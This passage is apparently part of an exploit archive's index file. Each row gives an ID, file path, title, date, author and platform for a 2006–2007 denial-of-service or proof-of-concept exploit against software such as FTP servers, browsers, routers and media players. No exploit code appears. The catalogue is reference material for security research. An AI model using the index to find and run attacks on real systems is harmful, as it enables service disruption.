Service",2006-01-07,FistFuXXer,windows,dos, -1411,exploits/hardware/dos/1411.pl,"Cisco IP Phone 7940 - Reboot (Denial of Service)",2006-01-10,kokanin,hardware,dos, -1416,exploits/windows/dos/1416.c,"HomeFtp 1.1 - 'NLST' Denial of Service",2006-01-14,pi3ch,windows,dos, -1422,exploits/windows/dos/1422.c,"Cerberus FTP Server 2.32 - Denial of Service",2006-01-16,pi3ch,windows,dos, -1423,exploits/windows/dos/1423.html,"Microsoft Internet Explorer 6.x - IMG / XML elements Denial of Service",2006-01-18,"Inge Henriksen",windows,dos, -1424,exploits/windows/dos/1424.pl,"TFTPD32 2.81 - GET Format String Denial of Service (PoC)",2006-01-19,"Critical Security",windows,dos, -1447,exploits/hardware/dos/1447.c,"Cisco Aironet Wireless Access Points - Memory Exhaustion ARP (Denial of Service)",2006-01-25,Pasv,hardware,dos, -1464,exploits/hardware/dos/1464.c,"Arescom NetDSL-1000 - 'TelnetD' Remote Denial of Service",2006-02-02,"Fabian Ramirez",hardware,dos, -1473,exploits/hardware/dos/1473.c,"Sony/Ericsson Bluetooth - Reset Display Denial of Service",2006-02-06,"Pierre Betouin",hardware,dos, -1475,exploits/windows/dos/1475.html,"Microsoft Internet Explorer 7.0 Beta 2 - 'urlmon.dll' Denial of Service",2006-02-07,"Tom Ferris",windows,dos, -1483,exploits/multiple/dos/1483.pl,"Half-Life CSTRIKE Server 1.6 (Non Steam) - Denial of Service",2006-02-11,Firestorm,multiple,dos, -1488,exploits/windows/dos/1488.txt,"Microsoft HTML Help Workshop - '.hhp' Denial of Service",2006-02-10,darkeagle,windows,dos, -1489,exploits/multiple/dos/1489.pl,"Invision Power Board 2.1.4 - Register Users Denial of Service",2006-02-10,SkOd,multiple,dos, -1496,exploits/hardware/dos/1496.c,"D-Link Wireless Access Point - Fragmented UDP Denial of Service",2006-02-14,"Aaron Portnoy",hardware,dos, -1500,exploits/windows/dos/1500.cpp,"Microsoft Windows Media Player 7.1 < 10 - '.BMP' Heap Overflow (PoC) (MS06-005) (1)",2006-02-15,ATmaCA,windows,dos, -1517,exploits/php/dos/1517.c,"PunBB 2.0.10 - Register Multiple Users Denial of Service",2006-02-20,K4P0,php,dos, -1531,exploits/windows/dos/1531.pl,"ArGoSoft FTP Server 1.4.3.5 - Remote Buffer Overflow (PoC)",2006-02-25,"Jerome Athias",windows,dos, -1535,exploits/windows/dos/1535.c,"CrossFire 1.8.0 - 'oldsocketmode' Remote Buffer Overflow (PoC)",2006-02-27,"Luigi Auriemma",windows,dos, -1540,exploits/bsd/dos/1540.pl,"FreeBSD 6.0 - 'nfsd' Remote Kernel Panic (Denial of Service)",2006-02-28,"Evgeny Legerov",bsd,dos, -1551,exploits/hardware/dos/1551.txt,"Multiple Routers - 'IRC Request' Disconnect Denial of Service",2006-03-04,"Ryan Meyer",hardware,dos, -1552,exploits/windows/dos/1552.pl,"XM Easy Personal FTP Server 1.0 - 'Port' Remote Overflow (PoC)",2006-03-04,luka.research,windows,dos, -1557,exploits/windows/dos/1557.c,"Freeciv 2.0.7 - Jumbo Malloc Crash (Denial of Service)",2006-03-06,"Luigi Auriemma",windows,dos, -1558,exploits/windows/dos/1558.c,"LieroX 0.62b - Remote Server/Client Denial of Service",2006-03-06,"Luigi Auriemma",windows,dos, -1559,exploits/windows/dos/1559.c,"Sauerbraten 2006_02_28 - Multiple Buffer Overflow / Crash",2006-03-06,"Luigi Auriemma",windows,dos, -1560,exploits/windows/dos/1560.c,"Cube 2005_08_29 - Multiple Buffer Overflow / Crash",2006-03-06,"Luigi Auriemma",windows,dos, -1564,exploits/windows/dos/1564.c,"Alien Arena 2006 Gold Edition 5.00 - Multiple Vulnerabilities",2006-03-07,"Luigi Auriemma",windows,dos, -1572,exploits/multiple/dos/1572.pl,"Dropbear / OpenSSH Server - 'MAX_UNAUTH_CLIENTS' Denial of Service",2006-03-10,str0ke,multiple,dos, -1573,exploits/php/dos/1573.php,"Guppy 4.5.11 - Delete Databases Remote Denial of Service",2006-03-10,trueend5,php,dos, -1593,exploits/windows/dos/1593.c,"Mercur MailServer 5.0 SP3 - 'IMAP' Denial of Service",2006-03-19,Omni,windows,dos, -1598,exploits/windows/dos/1598.html,"Microsoft Internet Explorer 6 - Script Action Handlers 'mshtml.dll' Denial of Service",2006-03-21,"Michal Zalewski",windows,dos, -1599,exploits/windows/dos/1599.cpp,"Microsoft Windows XP/2003 - IGMP v3 Denial of Service (MS06-007) (1)",2006-03-21,"Alexey Sintsov",windows,dos, -1601,exploits/windows/dos/1601.c,"ASP.NET w3wp - COM Components Remote Crash",2006-03-22,"Debasis Mohanty",windows,dos, -1603,exploits/windows/dos/1603.c,"Microsoft Windows XP/2003 - IGMP v3 Denial of Service (MS06-007) (2)",2006-03-22,Firestorm,windows,dos, -1604,exploits/windows/dos/1604.html,"Microsoft Internet Explorer 6 - 'mshtml.dll checkbox' Crash",2006-03-22,"Stelian Ene",windows,dos, -1613,exploits/windows/dos/1613.c,"Vavoom 1.19.1 - Multiple Vulnerabilities/Denial of Service",2006-03-26,"Luigi Auriemma",windows,dos, -1614,exploits/windows/dos/1614.c,"csDoom 0.7 - Multiple Vulnerabilities/Denial of Service",2006-03-26,"Luigi Auriemma",windows,dos, -1615,exploits/windows/dos/1615.txt,"Microsoft Office Products - Array Index Bounds Error (PoC)",2006-03-27,posidron,windows,dos, -1622,exploits/multiple/dos/1622.pl,"RealPlayer 10.5 (6.0.12.1040-1348) - SWF Buffer Overflow (PoC)",2006-03-28,"Federico L. Bossi Bonin",multiple,dos, -1633,exploits/windows/dos/1633.c,"Total Commander 6.x - 'unacev2.dll' Buffer Overflow (PoC)",2006-04-02,darkeagle,windows,dos, -1634,exploits/linux/dos/1634.pl,"mpg123 0.59r - Malformed .mp3 (SIGSEGV) (PoC)",2006-04-02,nitr0us,linux,dos, -1641,exploits/linux/dos/1641.pl,"Libxine 1.14 - MPEG Stream Buffer Overflow (PoC)",2006-04-04,"Federico L. Bossi Bonin",linux,dos, -1642,exploits/windows/dos/1642.c,"Ultr@VNC 1.0.1 - VNCLog::ReallyPrint Remote Buffer Overflow (PoC)",2006-04-04,"Luigi Auriemma",windows,dos, -1643,exploits/windows/dos/1643.c,"Ultr@VNC 1.0.1 - 'client Log::ReallyPrint' Buffer Overflow (PoC)",2006-04-04,"Luigi Auriemma",windows,dos, -1651,exploits/php/dos/1651.php,"ADODB < 4.70 - 'tmssql.php' Denial of Service",2006-04-09,rgod,php,dos, -1657,exploits/linux/dos/1657.asm,"Linux Kernel 2.6.x - 'sys_timer_create()' Local Denial of Service",2006-04-09,fingerout,linux,dos, -1667,exploits/multiple/dos/1667.html,"Mozilla Firefox 1.5.0.1 / Camino 1.0 - Null Pointer Dereference Crash",2006-04-13,BuHa,multiple,dos, -1671,exploits/multiple/dos/1671.c,"panic-reloaded - TCP Denial of Service Tool",2006-04-13,hash,multiple,dos, -1688,exploits/windows/dos/1688.c,"Neon Responder 5.4 - Clock Synchronization Denial of Service",2006-04-17,"Stefan Lochbihler",windows,dos, -1708,exploits/windows/dos/1708.txt,"Skulltag 0.96f - Version String Remote Format String (PoC)",2006-04-23,"Luigi Auriemma",windows,dos, -1709,exploits/multiple/dos/1709.txt,"OpenTTD 0.4.7 - Multiple Vulnerabilities",2006-04-23,"Luigi Auriemma",multiple,dos, -1712,exploits/osx/dos/1712.html,"Apple Mac OSX Safari 2.0.3 (417.9.2) - Multiple Vulnerabilities",2006-04-24,"Tom Ferris",osx,dos, -1715,exploits/osx/dos/1715.html,"Apple Mac OSX Safari 2.0.3 (417.9.2) - 'ROWSPAN' Denial of Service (PoC)",2006-04-24,"Yannick von Arx",osx,dos, -1716,exploits/multiple/dos/1716.html,"Mozilla Firefox 1.5.0.2 - 'js320.dll/xpcom_core.dll' Denial of Service (PoC)",2006-04-24,splices,multiple,dos, -1718,exploits/hardware/dos/1718.pl,"OCE 3121/3122 Printer - 'parser.exe' Denial of Service",2006-04-26,sh4d0wman,hardware,dos, -1721,exploits/windows/dos/1721.pl,"BL4 SMTP Server < 0.1.5 - Remote Buffer Overflow (PoC)",2006-04-27,"Dedi Dwianto",windows,dos, -1743,exploits/windows/dos/1743.pl,"Golden FTP Server Pro 2.70 - 'APPE' Remote Buffer Overflow (PoC)",2006-05-03,"Jerome Athias",windows,dos, -1746,exploits/linux/dos/1746.pl,"zawhttpd 0.8.23 - GET Remote Buffer Overflow Denial of Service",2006-05-04,"Kamil Sienicki",linux,dos, -1748,exploits/windows/dos/1748.py,"XM Easy Personal FTP Server 4.3 - 'USER' Remote Buffer Overflow (PoC)",2006-05-04,rewterz,windows,dos, -1749,exploits/windows/dos/1749.pl,"acFTP FTP Server 1.4 - 'USER' Remote Buffer Overflow (PoC)",2006-05-04,Preddy,windows,dos, -1754,exploits/windows/dos/1754.py,"FileCOPA FTP Server 1.01 - 'USER' Unauthenticated Remote Denial of Service",2006-05-05,Bigeazer,windows,dos, -1757,exploits/windows/dos/1757.c,"acFTP FTP Server 1.4 - 'USER' Remote Denial of Service",2006-05-06,Omni,windows,dos, -1758,exploits/windows/dos/1758.pl,"TinyFTPD 1.4 - 'USER' Remote Buffer Overflow Denial of Service",2006-05-06,[Oo],windows,dos, -1775,exploits/windows/dos/1775.html,"Microsoft Internet Explorer 6.0.2900 SP2 - CSS Attribute Denial of Service",2006-05-10,seven,windows,dos, -1781,exploits/windows/dos/1781.txt,"outgun 1.0.3 bot 2 - Multiple Vulnerabilities",2006-05-14,"Luigi Auriemma",windows,dos, -1782,exploits/windows/dos/1782.txt,"Empire 4.3.2 - 'strncat' Denial of Service",2006-05-14,"Luigi Auriemma",windows,dos, -1783,exploits/windows/dos/1783.txt,"Genecys 0.2 - Buffer Overflow / NULL pointer Denial of Service",2006-05-14,"Luigi Auriemma",windows,dos, -1784,exploits/windows/dos/1784.txt,"raydium svn 309 - Multiple Vulnerabilities",2006-05-14,"Luigi Auriemma",windows,dos, -1792,exploits/windows/dos/1792.txt,"GNUnet 0.7.0d - Empty UDP Packet Remote Denial of Service",2006-05-15,"Luigi Auriemma",windows,dos, -1801,exploits/multiple/dos/1801.txt,"libextractor 0.5.13 - Multiple Heap Overflows (PoC)",2006-05-17,"Luigi Auriemma",multiple,dos, -1802,exploits/multiple/dos/1802.html,"Mozilla Firefox 1.5.0.3 - 'Loop' Denial of Service",2006-05-18,"Gianni Amato",multiple,dos, -1815,exploits/linux/dos/1815.c,"portmap 5 Beta - 'Set/Dump' Local Denial of Service",2006-05-22,"Federico L. Bossi Bonin",linux,dos, -1819,exploits/multiple/dos/1819.txt,"PunkBuster < 1.229 - WebTool Service Remote Buffer Overflow Denial of Service",2006-05-23,"Luigi Auriemma",multiple,dos, -1820,exploits/multiple/dos/1820.txt,"netPanzer 0.8 rev 952 - 'frameNum' Server Terminiation",2006-05-23,"Luigi Auriemma",multiple,dos, -1838,exploits/windows/dos/1838.html,"Microsoft Internet Explorer - HTML Tag Memory Corruption (MS06-013)",2006-05-27,"Thomas Waldegger",windows,dos, -1852,exploits/linux/dos/1852.c,"gxine 0.5.6 - HTTP Plugin Remote Buffer Overflow (PoC)",2006-05-30,"Federico L. Bossi Bonin",linux,dos, -1856,exploits/windows/dos/1856.url,"Microsoft Internet Explorer 6 - 'inetconn.dll' Stack Overflow Crash",2006-05-31,Mr.Niega,windows,dos, -1867,exploits/multiple/dos/1867.html,"Mozilla Firefox 1.5.0.4 - 'marquee' Denial of Service",2006-06-02,n00b,multiple,dos, -1880,exploits/linux/dos/1880.c,"Linux Kernel < 2.6.16.18 - Netfilter NAT SNMP Module Remote Denial of Service",2006-06-05,"ECL Labs",linux,dos, -1894,exploits/linux/dos/1894.py,"0verkill 0.16 - ASCII-ART Game Remote Integer Overflow Crash (PoC)",2006-06-09,"Federico Fazzi",linux,dos, -1927,exploits/windows/dos/1927.pl,"Microsoft Excel - Unicode Local Overflow (PoC)",2006-06-18,kingcope,windows,dos, -1935,exploits/windows/dos/1935.cpp,"Winamp 5.21 - '.Midi' File Header Handling Buffer Overflow (PoC)",2006-06-20,BassReFLeX,windows,dos, -1937,exploits/multiple/dos/1937.html,"Opera 9 - long href Remote Denial of Service",2006-06-21,N9,multiple,dos, -1947,exploits/multiple/dos/1947.c,"BitchX 1.1-final - 'do_hook()' Remote Denial of Service",2006-06-24,"Federico L. Bossi Bonin",multiple,dos, -1949,exploits/windows/dos/1949.pl,"XM Easy Personal FTP Server 5.0.1 - 'Port' Remote Overflow (PoC)",2006-06-24,"Jerome Athias",windows,dos, -1967,exploits/windows/dos/1967.c,"Microsoft Windows - TCP/IP Protocol Driver Remote Buffer Overflow",2006-06-30,Preddy,windows,dos, -1972,exploits/multiple/dos/1972.txt,"Opera Web Browser 9.00 - 'iframe' Remote Denial of Service",2006-07-01,y3dips,multiple,dos, -1976,exploits/windows/dos/1976.cpp,"Quake 3 Engine Client - 'CG_ServerCommand()' Remote Overflow",2006-07-02,RunningBon,windows,dos, -1977,exploits/win_x86/dos/1977.cpp,"Quake 3 Engine Client (Windows x86) - CS_ITEms Remote Overflow",2006-07-02,RunningBon,win_x86,dos, -1980,exploits/windows/dos/1980.pl,"ImgSvr 0.6.5 - POST Denial of Service",2006-07-04,n00b,windows,dos, -1984,exploits/windows/dos/1984.py,"WinRAR 3.60 Beta 6 - SFX Path Stack Overflow",2006-07-05,posidron,windows,dos, -1989,exploits/windows/dos/1989.html,"Microsoft Internet Explorer 6 - Table.Frameset NULL Dereference",2006-07-07,"Aviv Raff",windows,dos, -1990,exploits/windows/dos/1990.html,"Microsoft Internet Explorer 6 - 'Internet.HHCtrl' Heap Overflow",2006-07-07,"H D Moore",windows,dos, -2000,exploits/hardware/dos/2000.pl,"SIPfoundry sipXtapi - 'CSeq' Remote Buffer Overflow (PoC)",2006-07-10,"Michael Thumann",hardware,dos, -2001,exploits/windows/dos/2001.c,"Microsoft Word 2000/2003 - Unchecked Boundary Condition",2006-07-10,"naveed afzal",windows,dos, -2037,exploits/windows/dos/2037.c,"Dumb 0.9.3 - 'it_read_envelope' Remote Heap Overflow (PoC)",2006-07-19,"Luigi Auriemma",windows,dos, -2039,exploits/windows/dos/2039.pl,"Microsoft Internet Explorer 6 - 'Content-Type' Stack Overflow Crash",2006-07-20,Firestorm,windows,dos, -2051,exploits/linux/dos/2051.py,"Sendmail 8.13.5 - Remote Signal Handling (PoC)",2006-07-21,redsand,linux,dos, -2057,exploits/windows/dos/2057.c,"Microsoft Windows - Mailslot Ring0 Memory Corruption (MS06-035)",2006-07-21,cocoruder,windows,dos, -2059,exploits/hardware/dos/2059.cpp,"D-Link Devices - UPNP Stack Overflow Denial of Service (PoC)",2006-07-22,ub3rst4r,hardware,dos, -2073,exploits/multiple/dos/2073.c,"libmikmod 3.2.2 - GT2 Loader Local Heap Overflow (PoC)",2006-07-25,"Luigi Auriemma",multiple,dos, -2124,exploits/windows/dos/2124.php,"XChat 2.6.7 (Windows) - Remote Denial of Service (PHP)",2006-08-07,ratboy,windows,dos, -2147,exploits/windows/dos/2147.pl,"XChat 2.6.7 (Windows) - Remote Denial of Service (Perl)",2006-08-08,Elo,windows,dos, -2156,exploits/hardware/dos/2156.c,"PocketPC Mms Composer - 'WAPPush' Denial of Service",2006-08-09,"Collin Mulliner",hardware,dos, -2160,exploits/windows/dos/2160.c,"OpenMPT 1.17.02.43 - Multiple Remote Buffer Overflows (PoC)",2006-08-10,"Luigi Auriemma",windows,dos, -2176,exploits/hardware/dos/2176.html,"Nokia Symbian 60 3rd Edition - Browser Crash (Denial of Service)",2006-08-13,Qode,hardware,dos, -2179,exploits/multiple/dos/2179.c,"Opera 9 - IRC Client Remote Denial of Service",2006-08-13,Preddy,multiple,dos, -2180,exploits/multiple/dos/2180.py,"Opera 9 IRC Client - Remote Denial of Service (Python)",2006-08-13,Preddy,multiple,dos, -2194,exploits/windows/dos/2194.pl,"Microsoft Windows - '.png' IHDR Block Denial of Service (PoC) (1)",2006-08-16,Preddy,windows,dos, -2195,exploits/windows/dos/2195.html,"VMware 5.5.1 - COM Object Arbitrary Partition Table Delete",2006-08-16,nop,windows,dos, -2204,exploits/windows/dos/2204.c,"Microsoft Windows - '.png' IHDR Block Denial of Service (PoC) (3)",2006-08-17,Preddy,windows,dos, -2208,exploits/windows/dos/2208.html,"Macromedia Flash 9 - IE Plugin Remote Crash (Denial of Service)",2006-08-18,Mr.Niega,windows,dos, -2210,exploits/windows/dos/2210.c,"Microsoft Windows - '.png' IHDR Block Denial of Service (PoC) (2)",2006-08-18,vegas78,windows,dos, -2238,exploits/windows/dos/2238.html,"Microsoft Internet Explorer - Multiple COM Object Color Property Denial of Service Vulnerabilities",2006-08-21,nop,windows,dos, -2244,exploits/multiple/dos/2244.pl,"Mozilla Firefox 1.5.0.6 - FTP Request Remote Denial of Service",2006-08-22,"Tomas Kempinsky",multiple,dos, -2245,exploits/windows/dos/2245.pl,"MDaemon POP3 Server < 9.06 - 'USER' Remote Buffer Overflow (PoC)",2006-08-22,"Leon Juranic",windows,dos, -2246,exploits/hardware/dos/2246.cpp,"2WIRE Modems/Routers - 'CRLF' Denial of Service",2006-08-22,preth00nker,hardware,dos, -2302,exploits/windows/dos/2302.pl,"J. River Media Center 11.0.309 - Remote Denial of Service (PoC)",2006-09-05,n00b,windows,dos, -2303,exploits/multiple/dos/2303.html,"dsock 1.3 - 'buf' Remote Buffer Overflow (PoC)",2006-09-05,DaveK,multiple,dos, -2334,exploits/windows/dos/2334.py,"Multi-Threaded TFTP 1.1 - GET Denial of Service",2006-09-08,n00b,windows,dos, -2400,exploits/windows/dos/2400.html,"Microsoft Internet Explorer - VML Remote Denial of Service (PoC)",2006-09-19,Shirkdog,windows,dos, -2444,exploits/multiple/dos/2444.sh,"OpenSSH 4.3 p1 - Duplicated Block Remote Denial of Service",2006-09-27,"Tavis Ormandy",multiple,dos, -2515,exploits/multiple/dos/2515.txt,"Kmail 1.9.1 - IMG SRC Remote Denial of Service",2006-10-11,nnp,multiple,dos, -2523,exploits/windows/dos/2523.pl,"Microsoft Office 2003 - '.PPT' Local Buffer Overflow (PoC)",2006-10-12,Nanika,windows,dos, -2524,exploits/bsd/dos/2524.c,"FreeBSD 5.4/6.0 - 'ptrace PT_LWPINFO' Local Denial of Service",2006-10-12,kokanin,bsd,dos, -2541,exploits/bsd/dos/2541.c,"FreeBSD 6.1-RELEASE-p10 - 'ftruncate' Local Denial of Service",2006-10-13,kokanin,bsd,dos, -2542,exploits/bsd/dos/2542.c,"FreeBSD 6.1-RELEASE-p10 - 'scheduler' Local Denial of Service",2006-10-13,kokanin,bsd,dos, -2571,exploits/windows/dos/2571.pl,"Xfire 1.6.4 - Remote Denial of Service (Perl)",2006-10-16,n00b,windows,dos, -2586,exploits/multiple/dos/2586.pl,"Clam AntiVirus 0.88.4 - CHM Chunk Name Length Denial of Service (PoC)",2006-10-17,"Damian Put",multiple,dos, -2587,exploits/multiple/dos/2587.txt,"Clam AntiVirus 0.88.4 - 'rebuildpe' Remote Heap Overflow (PoC)",2006-10-17,"Damian Put",multiple,dos, -2597,exploits/multiple/dos/2597.pl,"Asterisk 1.0.12/1.2.12.1 - 'chan_skinny' Remote Heap Overflow (PoC)",2006-10-19,"Noam Rathaus",multiple,dos, -2625,exploits/windows/dos/2625.c,"QK SMTP 3.01 - 'RCPT TO' Remote Denial of Service",2006-10-23,"Greg Linares",windows,dos, -2629,exploits/windows/dos/2629.html,"Microsoft Internet Explorer - ADODB Execute Denial of Service (PoC)",2006-10-24,"YAG KOHHA",windows,dos, -2639,exploits/bsd/dos/2639.c,"FreeBSD 6.1 - '/dev/crypto' Local Kernel Denial of Service",2006-10-24,"Evgeny Legerov",bsd,dos, -2650,exploits/windows/dos/2650.c,"RevilloC MailServer 1.x - 'RCPT TO' Remote Denial of Service",2006-10-25,"Greg Linares",windows,dos, -2672,exploits/windows/dos/2672.py,"Microsoft Windows - NAT Helper Components 'ipnathlp.dll' Remote Denial of Service",2006-10-28,h07,windows,dos, -2682,exploits/windows/dos/2682.pl,"Microsoft Windows - NAT Helper Components Remote Denial of Service (Perl)",2006-10-30,x82,windows,dos, -2695,exploits/multiple/dos/2695.html,"Mozilla Firefox 1.5.0.7/2.0 - 'createRange' Remote Denial of Service",2006-10-31,"Gotfault Security",multiple,dos, -2700,exploits/hardware/dos/2700.rb,"Apple Airport - 802.11 Probe Response Kernel Memory Corruption (PoC) (Metasploit)",2006-11-01,"H D Moore",hardware,dos, -2708,exploits/windows/dos/2708.c,"NullSoft Winamp 5.3 - Ultravox-Max-Msg Heap Overflow Denial of Service (PoC)",2006-11-03,cocoruder,windows,dos, -2715,exploits/windows/dos/2715.pl,"XM Easy Personal FTP Server 5.2.1 - Remote Denial of Service",2006-11-04,boecke,windows,dos, -2716,exploits/windows/dos/2716.pl,"Essentia Web Server 2.15 - GET Remote Denial of Service",2006-11-04,CorryL,windows,dos, -2730,exploits/linux/dos/2730.pm,"OpenLDAP 2.2.29 - Remote Denial of Service (Metasploit)",2006-11-06,"Evgeny Legerov",linux,dos, -2734,exploits/windows/dos/2734.py,"WFTPD Pro Server 3.23.1.1 - 'APPE' Remote Buffer Overflow (PoC)",2006-11-07,"Joxean Koret",windows,dos, -2735,exploits/windows/dos/2735.py,"WarFTPd 1.82.00-RC11 - Remote Denial of Service",2006-11-07,"Joxean Koret",windows,dos, -2783,exploits/windows/dos/2783.html,"WinZip 10.0.7245 - FileView ActiveX Control Stack Overflow (PoC)",2006-11-14,prdelka,windows,dos, -2787,exploits/windows/dos/2787.c,"UniversalFTP 1.0.50 - 'MKD' Remote Denial of Service",2006-11-15,"Greg Linares",windows,dos, -2854,exploits/windows/dos/2854.py,"AT-TFTP 1.9 - 'Filename' Remote Buffer Overflow (PoC)",2006-11-27,"Liu Qixu",windows,dos, -2855,exploits/windows/dos/2855.py,"3Com TFTP Service (3CTftpSvc) 2.0.1 - 'Long Transporting Mode' Overflow (PoC)",2006-11-27,"Liu Qixu",windows,dos, -2857,exploits/multiple/dos/2857.php,"PHP 4.4.4/5.1.6 - 'htmlentities()' Local Buffer Overflow (PoC)",2006-11-27,"Nick Kezhaya",multiple,dos, -2860,exploits/windows/dos/2860.c,"Quintessential Player 4.50.1.82 - Playlist Denial of Service (PoC)",2006-11-28,"Greg Linares",windows,dos, -2861,exploits/windows/dos/2861.c,"Songbird Media Player 0.2 - Format String Denial of Service (PoC)",2006-11-28,"Greg Linares",windows,dos, -2874,exploits/bsd/dos/2874.pl,"NetBSD - 'FTPd / Tnftpd' Remote Stack Overflow (PoC)",2006-11-30,kingcope,bsd,dos, -2879,exploits/windows/dos/2879.py,"Microsoft Windows - spoolss GetPrinterData() Remote Denial of Service",2006-12-01,h07,windows,dos, -2892,exploits/linux/dos/2892.py,"F-Prot AntiVirus 4.6.6 - 'ACE' Denial of Service",2006-12-04,"Evgeny Legerov",linux,dos, -2893,exploits/linux/dos/2893.py,"F-Prot AntiVirus 4.6.6 - CHM Heap Overflow (PoC)",2006-12-04,"Evgeny Legerov",linux,dos, -2900,exploits/windows/dos/2900.py,"Microsoft Windows - DNS Resolution Remote Denial of Service (PoC) (MS06-041)",2006-12-09,"Winny Thomas",windows,dos, -2901,exploits/windows/dos/2901.php,"FileZilla FTP Server 0.9.20b/0.9.21 - 'STOR' Denial of Service",2006-12-09,rgod,windows,dos, -2910,exploits/multiple/dos/2910.txt,"Sophos AntiVirus - '.CHM' File Heap Overflow (PoC)",2006-12-10,"Damian Put",multiple,dos, -2911,exploits/multiple/dos/2911.txt,"Sophos AntiVirus - '.CHM' Chunk Name Length Memory Corruption (PoC)",2006-12-10,"Damian Put",multiple,dos, -2912,exploits/multiple/dos/2912.txt,"Sophos / Trend Micro AntiVirus - '.RAR' File Denial of Service (PoC)",2006-12-10,"Damian Put",multiple,dos, -2914,exploits/windows/dos/2914.php,"FileZilla FTP Server 0.9.21 - 'LIST/NLST' Denial of Service",2006-12-11,shinnai,windows,dos, -2915,exploits/hardware/dos/2915.c,"D-Link DWL-2000AP 2.11 - ARP Flood Remote Denial of Service",2006-12-11,poplix,hardware,dos, -2916,exploits/windows/dos/2916.php,"Golden FTP server 1.92 - 'USER/PASS' Heap Overflow (PoC)",2006-12-11,rgod,windows,dos, -2922,exploits/windows/dos/2922.txt,"Microsoft Word Document - Malformed Pointer (PoC)",2006-12-12,DiscoJonny,windows,dos, -2926,exploits/windows/dos/2926.py,"Crob FTP Server 3.6.1 build 263 - 'LIST/NLST' Denial of Service",2006-12-13,shinnai,windows,dos, -2928,exploits/linux/dos/2928.py,"ProFTPd 1.3.0a - 'mod_ctrls' 'support' Local Buffer Overflow (PoC)",2006-12-13,"Core Security",linux,dos, -2929,exploits/windows/dos/2929.cpp,"Microsoft Internet Explorer 7 - DLL-load Hijacking Code Execution (PoC)",2006-12-14,"Aviv Raff",windows,dos, -2934,exploits/windows/dos/2934.php,"Sambar FTP Server 6.4 - 'SIZE' Remote Denial of Service",2006-12-15,rgod,windows,dos, -2935,exploits/windows/dos/2935.sh,"Microsoft Windows Media Player 9/10 - '.mid' Denial of Service",2006-12-15,sehato,windows,dos, -2942,exploits/windows/dos/2942.py,"Star FTP Server 1.10 - 'RETR' Remote Denial of Service",2006-12-17,Necro,windows,dos, -2946,exploits/windows/dos/2946.html,"Microsoft Office Outlook Recipient Control - 'ole32.dll' Denial of Service",2006-12-18,shinnai,windows,dos, -2947,exploits/multiple/dos/2947.pl,"wget 1.10.2 - Unchecked Boundary Condition Denial of Service",2006-12-18,"Federico L. Bossi Bonin",multiple,dos, -2949,exploits/multiple/dos/2949.c,"Intel 2200BG 802.11 - Beacon frame Kernel Memory Corruption",2006-12-19,"Breno Silva Pinto",multiple,dos, -2952,exploits/windows/dos/2952.py,"WinFTP Server 2.0.2 - 'PASV' Remote Denial of Service",2006-12-19,shinnai,windows,dos, -2954,exploits/linux/dos/2954.html,"KDE libkhtml 3.5 < 4.2.0 - Unhandled HTML Parse Exception",2006-12-19,"Federico L. Bossi Bonin",linux,dos, -2961,exploits/hardware/dos/2961.py,"Hewlett-Packard (HP) FTP Print Server 2.4.5 - Buffer Overflow (PoC)",2006-12-19,"Joxean Koret",hardware,dos, -2966,exploits/windows/dos/2966.html,"RealPlayer 10.5 - ActiveX Control Denial of Service",2006-12-20,shinnai,windows,dos, -2967,exploits/windows/dos/2967.cs,"Microsoft Windows - 'MessageBox' Memory Corruption Local Denial of Service",2006-12-20,anonymous,windows,dos, -2972,exploits/windows/dos/2972.c,"BolinTech DreamFTP Server 1.0.2 - 'PORT' Remote Denial of Service",2006-12-21,InTeL,windows,dos, -2978,exploits/windows/dos/2978.py,"XM Easy Personal FTP Server 5.2.1 - 'USER' Format String Denial of Service",2006-12-22,shinnai,windows,dos, -2985,exploits/windows/dos/2985.pl,"acFTP FTP Server 1.5 - 'REST/PBSZ' Remote Denial of Service",2006-12-23,gbr,windows,dos, -3013,exploits/windows/dos/3013.py,"Microsoft Windows - 'NetrWkstaUserEnum()' Remote Denial of Service",2006-12-25,h07,windows,dos, -3023,exploits/linux/dos/3023.c,"KsIRC 1.3.12 - 'PRIVMSG' Remote Buffer Overflow (PoC)",2006-12-26,"Federico L. Bossi Bonin",linux,dos, -3030,exploits/windows/dos/3030.html,"RealPlayer 10.5 'ierpplug.dll' Internet Explorer 7 - Denial of Service",2006-12-28,shinnai,windows,dos, -3034,exploits/windows/dos/3034.py,"AIDeX Mini-WebServer 1.1 - Remote Crash (Denial of Service)",2006-12-28,shinnai,windows,dos, -3038,exploits/windows/dos/3038.php,"Durian Web Application Server 3.02 - Denial of Service",2006-12-29,rgod,windows,dos, -3041,exploits/windows/dos/3041.html,"Macromedia Flash 8 (Flash8b.ocx) Internet Explorer 7 - Denial of Service",2006-12-29,shinnai,windows,dos, -3042,exploits/windows/dos/3042.html,"Macromedia Shockwave 10 'SwDir.dll' Internet Explorer 7 - Denial of Service",2006-12-29,shinnai,windows,dos, -3052,exploits/windows/dos/3052.c,"Microsoft Windows - 'Csrss.exe/winsrv.dll' NtRaiseHardError Double-Free",2006-12-31,"Ruben Santamarta",windows,dos, -3056,exploits/windows/dos/3056.pl,"Formbankserver 1.9 - 'Name' Remote Denial of Service",2006-12-31,Bl0od3r,windows,dos, -3069,exploits/osx/dos/3069.pl,"VideoLAN VLC Media Player 0.8.6 (PPC) - 'udp://' Format String (PoC)",2007-01-02,MoAB,osx,dos, -3078,exploits/windows/dos/3078.pl,"Acunetix WVS 4.0 20060717 - HTTP Sniffer Component Remote Denial of Service",2007-01-04,nitr0us,windows,dos, -3080,exploits/osx/dos/3080.rb,"iLife iPhoto Photocast - XML Title Remote Format String (PoC)",2007-01-04,MoAB,osx,dos, -3098,exploits/osx/dos/3098.html,"OmniWeb 5.5.1 - JavaScript alert() Remote Format String (PoC)",2007-01-07,MoAB,osx,dos, -3101,exploits/multiple/dos/3101.py,"Opera 9.10 - '.jpg' Image DHT Marker Heap Corruption",2007-01-08,posidron,multiple,dos, -3110,exploits/osx/dos/3110.rb,"Apple Mac OSX 10.4.8 - Apple Finder DMG Volume Name Memory Corruption (PoC)",2007-01-09,MoAB,osx,dos, -3111,exploits/windows/dos/3111.pl,"Microsoft Windows Explorer - '.WMF' CreateBrushIndirect Denial of Service",2007-01-13,cyanid-E,windows,dos, -3112,exploits/windows/dos/3112.py,"eIQnetworks Network Security Analyzer - Null Pointer Dereference",2007-01-10,"Ethan Hunt",windows,dos, -3119,exploits/windows/dos/3119.py,"VideoLAN VLC Media Player 0.8.6a - Denial of Service (1)",2007-01-12,shinnai,windows,dos, -3126,exploits/windows/dos/3126.c,"WFTPD Pro Server 3.25 - Site ADMN Remote Denial of Service",2007-01-14,Marsu,windows,dos, 